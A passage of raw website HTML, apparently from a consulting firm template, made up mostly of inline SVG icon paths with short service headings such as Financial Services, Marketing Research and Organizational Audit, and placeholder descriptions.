32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>					
			        				            <h6>Consumer Products</h6>			            <p>Our work draws on more than 40 years of experience, delivered by 5,700 professionals in the world.</p>			        
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>	        
				<h5><a href="#">Financial Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m456.907 161.731-36.977-14.932c-5.967-2.408-12.25-3.628-18.678-3.628-.03 0-.06 0-.09 0l-24.136.04-20.518-19.911c5.611-3.677 9.33-10.01 9.33-17.204 0-11.34-9.227-20.567-20.567-20.567h-26.483c-.377 0-.745.037-1.107.091l-83.802-81.325c-2.83-2.748-6.562-4.263-10.51-4.267l-42.989-.028c-.002 0-.004 0-.005 0-3.635 0-7.013 1.96-8.815 5.118-1.804 3.158-1.774 7.065.075 10.194l75.651 128.099-41.77.065c-1.196.001-2.404.092-3.59.27-.059.009-.118.018-.177.029l-70.077 12.26-49.75-37.177c-2.049-1.533-4.583-2.376-7.139-2.376-.008 0-.016 0-.023 0l-24.191.042c-3.835.008-7.347 2.111-9.164 5.488s-1.637 7.465.468 10.667l34.021 51.798-33.842 51.918c-2.094 3.213-2.258 7.302-.427 10.673 1.827 3.363 5.337 5.45 9.161 5.45h.021l24.19-.042c2.566-.005 5.106-.857 7.149-2.397l49.624-37.352 70.119 12.016c.061.011.123.02.185.029 1.18.171 2.397.244 3.577.257l41.861-.065-37.682 63.807c-6.849-3.421-10.843-6.886-12.607-8.651-1.956-1.955-3.795-4.086-5.467-6.335-3.195-4.301-8.101-6.773-13.46-6.787-.015 0-.028 0-.042 0-5.355 0-10.271 2.457-13.49 6.745-1.672 2.226-3.536 4.371-5.544 6.377-6.604 6.605-22.881 17.722-57.691 17.975l-11.326.082c-6.876.05-12.471 5.685-12.471 12.562v40.948c0 4.109 3.33 7.439 7.439 7.439s7.439-3.33 7.439-7.439v-38.647l9.027-.066c40.116-.292 59.888-14.117 68.103-22.331 2.501-2.501 4.829-5.181 6.922-7.967.521-.694 1.22-.8 1.593-.8h.005c.445.002 1.075.139 1.556.786 2.104 2.828 4.421 5.513 6.886 7.979 6.615 6.614 26.491 22.031 68.105 22.333l9.027.066v73.838c0 14.933-3.471 29.913-10.038 43.322s-16.273 25.336-28.07 34.493l-37.26 28.918c-2.961 2.297-6.503 3.511-10.245 3.511s-7.284-1.214-10.243-3.51l-37.261-28.919c-11.796-9.156-21.503-21.083-28.07-34.493-6.566-13.409-10.038-28.389-10.038-43.322 0-4.109-3.33-7.439-7.439-7.439s-7.439 3.33-7.439 7.439c0 17.188 3.995 34.432 11.554 49.866 7.559 15.435 18.731 29.163 32.308 39.702l37.262 28.919c5.513 4.278 12.39 6.635 19.364 6.635s13.852-2.357 19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>	        
				<h5><a href="#">Airlines & Transport</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Government Services</a></h5>				<p>We help financial institutions, from banking and insurance to wealth.</p>			
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M488.399,492h-21.933V173.536c0-14.823-12.06-26.882-26.882-26.882H390.56c-14.823,0-26.882,12.06-26.882,26.882V492    h-55.692V317.825c0-14.823-12.059-26.882-26.882-26.882H232.08c-14.823,0-26.882,12.06-26.882,26.882V492h-55.692v-90.204    c0-14.823-12.06-26.882-26.882-26.882H73.599c-14.823,0-26.882,12.06-26.882,26.882V492H23.601c-5.523,0-10,4.477-10,10    s4.477,10,10,10h464.798c5.523,0,10-4.477,10-10S493.922,492,488.399,492z M129.504,492H66.716v-90.204    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z M287.985,492h-62.788V317.825    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.794,0,6.882,3.087,6.882,6.882V492z M446.466,492h-62.788V173.536    c0-3.795,3.087-6.882,6.882-6.882h49.024c3.795,0,6.882,3.087,6.882,6.882V492z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M466.442,10.516c0.14-2.729-0.82-5.504-2.904-7.588c-2.084-2.084-4.859-3.045-7.588-2.904    C455.789,0.017,455.63,0,455.466,0h-60.5c-5.523,0-10,4.477-10,10s4.477,10,10,10h37.357l-98.857,98.858l-37.28-37.28    c-1.875-1.875-4.419-2.929-7.071-2.929c-2.652,0-5.196,1.054-7.071,2.929l-179.769,179.77c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.951,4.512,2.927,7.071,2.927s5.119-0.976,7.071-2.929L289.115,102.79l37.28,37.28c3.905,3.905,10.237,3.905,14.143,0    L446.466,34.143v33.81c0,5.523,4.477,10,10,10s10-4.477,10-10V11C466.466,10.837,466.449,10.678,466.442,10.516z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="75.64" cy="303.31" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<circle cx="10.06" cy="500.446" r="10.06"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="267.005" cy="245.308" r="10.04"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M398.479,118.032c-8.071-8.072-18.802-12.516-30.216-12.516c-11.414,0-22.146,4.446-30.216,12.516    c-16.661,16.662-16.661,43.772,0,60.433c8.332,8.331,19.272,12.495,30.216,12.495c10.941,0,21.886-4.166,30.216-12.495    C415.14,161.803,415.14,134.693,398.479,118.032z M384.282,164.266c-8.833,8.832-23.206,8.832-32.037,0    c-8.833-8.832-8.833-23.204,0-32.037c4.279-4.279,9.967-6.635,16.018-6.635c6.051,0,11.739,2.356,16.018,6.635    C393.114,141.062,393.114,155.434,384.282,164.266z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M125.409,411.45c-4.964-2.472-10.99-0.451-13.462,4.512l-11.958,24.015c-5.2,10.441-15.658,17.423-27.296,18.219    l-13.908,0.952c-2.351,0.157-3.897-1.014-4.612-1.729s-1.889-2.264-1.729-4.613l0.952-13.907    c0.797-11.637,7.779-22.096,18.219-27.296l24.014-11.958c4.964-2.472,6.984-8.499,4.512-13.462    c-2.471-4.963-8.498-6.984-13.462-4.512l-24.014,11.958c-16.792,8.362-28.02,25.182-29.302,43.898l-0.952,13.907    c-0.514,7.507,2.242,14.863,7.562,20.183c4.898,4.898,11.523,7.624,18.403,7.624c0.591,0,1.186-0.02,1.78-0.061l13.908-0.952    c18.716-1.281,35.536-12.508,43.898-29.302l11.958-24.014C132.392,419.948,130.372,413.922,125.409,411.45z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M505.07,8.18c-4.711-4.641-11.201-7.068-17.793-6.639l-9.348,0.596c-83.819,5.351-162.262,45.81-215.215,111.004    L240.71,140.23l-57.583-1.691c-0.098-0.003-0.197-0.004-0.294-0.004c-45.668,0-88.603,17.784-120.896,50.076L2.959,247.59    c-2.805,2.805-3.696,7-2.272,10.702c1.424,3.703,4.894,6.221,8.856,6.423l124.844,6.414l-5.09,6.267    c-2.565,3.159-2.971,7.553-1.026,11.127c1.956,3.596,4.006,7.135,6.144,10.617l-29.606,35.147    c-2.531,3.005-3.076,7.211-1.397,10.763c6.467,13.665,15.05,25.943,25.514,36.493c10.718,10.808,23.251,19.646,37.249,26.271    c1.368,0.648,2.835,0.965,4.293,0.965c2.261,0,4.503-0.764,6.327-2.243c6.378-5.174,13.731-11.311,20.843-17.245    c5.069-4.23,10.255-8.557,15.102-12.547c2.893,1.741,5.822,3.429,8.795,5.046c1.504,0.818,3.153,1.221,4.796,1.221    c2.186,0,4.358-0.712,6.156-2.108l6.843-5.31l6.442,125.37c0.204,3.962,2.721,7.432,6.423,8.856c1.172,0.45,2.39,0.67,3.6,0.67    c2.615,0,5.183-1.023,7.101-2.942l58.979-58.979c32.293-32.293,50.076-75.227,50.076-120.896v-54.995l23.267-18.055    c69.729-54.11,112.196-135.704,116.512-223.862l0.239-4.886C512.295,19.27,509.779,12.822,505.07,8.18z M33.123,245.822    l43.012-43.012c28.465-28.465,66.303-44.157,106.553-44.196l42.085,1.236l-74.71,91.98L33.123,245.822z M184.774,373.874    c-5.241,4.372-10.614,8.856-15.6,12.957c-9.644-5.223-18.368-11.74-25.992-19.428c-7.384-7.445-13.669-15.922-18.737-25.26    l21.676-25.733c6.554,8.793,13.728,17.122,21.478,24.925c0.006,0.006,0.012,0.011,0.018,0.017    c0.002,0.002,0.004,0.005,0.006,0.007c0.003,0.003,0.006,0.005,0.009,0.008c8.593,8.648,17.836,16.584,27.641,23.761    C191.811,368.002,188.264,370.962,184.774,373.874z M351.875,327.672c0,40.305-15.695,78.197-44.196,106.698l-43.012,43.012    l-6.002-116.792l93.209-72.33V327.672z M491.678,29.779c-4.029,82.297-43.673,158.467-108.767,208.98l-157.46,122.189    c-13.058-7.63-25.229-16.639-36.368-26.846l53.086-53.086c3.92-3.92,3.92-10.278,0-14.199c-3.921-3.921-10.278-3.921-14.199,0    l-53.036,53.036c-9.751-10.795-18.387-22.541-25.74-35.104L278.3,125.8C327.732,64.941,400.96,27.171,479.207,22.177l9.348-0.596    c1.225-0.076,2.045,0.532,2.423,0.904c0.377,0.371,1,1.178,0.94,2.409L491.678,29.779z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
        			<a href="#"class="link-details"> Learn More</a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="254.4" cy="237.32" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="172.07" cy="55.21" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="290.4" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="254.4" cy="343.47" r="10"></circle>
	</g>
</g>
<g>
	<g>
